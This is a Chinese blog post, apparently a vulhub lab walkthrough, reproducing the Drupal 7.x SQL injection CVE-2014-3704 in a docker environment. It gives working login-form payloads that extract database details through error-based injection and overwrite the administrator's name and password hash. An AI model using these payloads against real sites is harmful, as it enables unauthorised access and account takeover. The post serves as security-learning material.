山西网站建设公司,网络科技公司名称,南昌seo排名收费,阿里云1核2g服务器能建设几个网站#x1f36c; 博主介绍 #x1f468;#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 _PowerShell #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 #x1f389;点赞➕评论➕收藏 养成习… 博主介绍 博主介绍大家好我是 _PowerShell 很高兴认识大家~ ✨主攻领域【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 文章目录 博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2014-3704环境2、启动CVE-2014-3704环境3、查看CVE-2014-3704环境4、访问CVE-2014-3704环境5、查看CVE-2014-3704漏洞提示信息6、关闭CVE-2014-3704环境五、漏洞复现1、抓登陆页面的数据包包2、获取数据库当前当前用户3、获取数据库版本4、获取当前使用数据库5、修改管理员账号密码六、漏洞修复七、相关资源一、漏洞编号
CVE-2014-3704二、影响范围
Drupal 7.32的7.x版本三、漏洞描述 Drupal 是一款用量庞大的CMS其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞攻击者可以执行任意SQL语句插入、修改管理员信息甚至执行任意代码。 四、环境搭建
1、进入CVE-2014-3704环境
cd vulhub/confluence/CVE-2014-37042、启动CVE-2014-3704环境
docker-compose up -d3、查看CVE-2014-3704环境
docker-compose ps4、访问CVE-2014-3704环境 环境启动后访问http://your-ip:8080会进入安装引导。 http://192.168.233.130:8080/进入Drupal的安装页面使用默认配置安装即可。 一直点击save and continue就ok了 到了配置数据库这一步 数据库类型myqsl 数据库名字drupal 数据库用户名root 数据库密码root 高级选项中Database host为mysql 然后接着save and continue直到下面这个页面进入站点 注意中间有一步需要配置登录密码忘截图了 进入站点后 5、查看CVE-2014-3704漏洞提示信息
cat README.md6、关闭CVE-2014-3704环境 复现完记得关闭环境 docker-compose down五、漏洞复现
1、抓登陆页面的数据包包 登陆页面抓个包 http://192.168.233.130:8080/抓到的数据包如下放到重放攻击模块 2、获取数据库当前当前用户 使用如下POC进行替换 passlolform_build_idform_iduser_login_blockopLoginname[0 or updatexml(0,concat(0xa,user()),0)%23]bobname[0]a发送数据包回显如下利用 SQL 报错语句打印当前用户证明存在SQL注入漏洞 3、获取数据库版本 使用如下POC进行替换 passlolform_build_idform_iduser_login_blockopLoginname[0 or updatexml(0,concat(0xa,Version()),0)%23]bobname[0]a数据库版本为5.5.62没有系统表 4、获取当前使用数据库 使用如下POC进行替换 passlolform_build_idform_iduser_login_blockopLoginname[0 or updatexml(0,concat(0xa,database()),0)%23]bobname[0]a回显如下获取到了当前数据库为drupal 5、修改管理员账号密码 使用如下POC进行替换 将原来id为1的管理替换成名字为123456密码是thanks的管理员。 passlolform_build_idform_iduser_login_blockopLoginname[0%20;updateuserssetname%3d123456,pass%3d$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZldwhereuid%3d1;;#%20%20]bobname[0]a用之前的管理员账号密码就登陆失败了 使用123456thanks登陆成功管理员账号密码被成功修改(可配合CVE-2018-7602使用) 六、漏洞修复 升级Drupal为最新版本 七、相关资源 1、docker 搭建 vulhub 靶场环境 2、[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本含漏洞复现文章连接 3、[ vulhub漏洞复现篇 ] vulhub 漏洞集合含漏洞复现文章连接
